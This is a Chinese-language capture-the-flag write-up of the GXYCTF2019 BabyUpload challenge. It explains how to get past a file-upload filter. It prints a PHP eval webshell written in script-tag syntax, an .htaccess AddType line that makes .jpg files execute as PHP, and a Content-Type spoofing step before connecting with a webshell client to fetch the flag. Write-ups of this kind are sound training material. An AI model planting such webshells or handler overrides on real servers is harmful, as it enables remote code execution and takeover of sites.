[GXYCTF2019]BabyUpload

flagflag打开网站，先上传一个.php试试。

提示后缀名不能有ph。

这里想到了之前在ctfhub技能树上做过一道题目，可以上传.htaccess文件，来实现把后缀名为其它类型的转换成php执行，所以这里使用这个方法来上传。

不了解.htaccess的可以先看这篇文章，之后会用到。

文件上传漏洞之.htaccess文件-CSDN博客

开始上传，先编写好一个一句话木马

然后把它改成jpg文件进行上传。

发现出现

这里应该是过滤掉了php代码标志。

那么我们再次进行抓包，查看一下是否又其他可用信息。

在这里我们看到该网站的php为5.6.23版本。

经过查询，了解到php版本在7.0以下可以执行

<script language="php">xxx</script>

来代替php。

所以这里重新写入一句话木马为

<script language="php">eval($_POST['123']);</script>

然后修改文件后缀名为.jpg再次进行上传。

上传成功！！！

之后编写.htaccess文件

AddType application/x-httpd-php .jpg

之后进行上传，抓包

修改application/octet-stream为image/jpeg后放包。

访问上传后图片的地址，之后使用蚁剑进行连接即可。

连接后在根目录中找到flag。

 

flag{c5741452-3492-43f1-b22c-c60d42e19d48}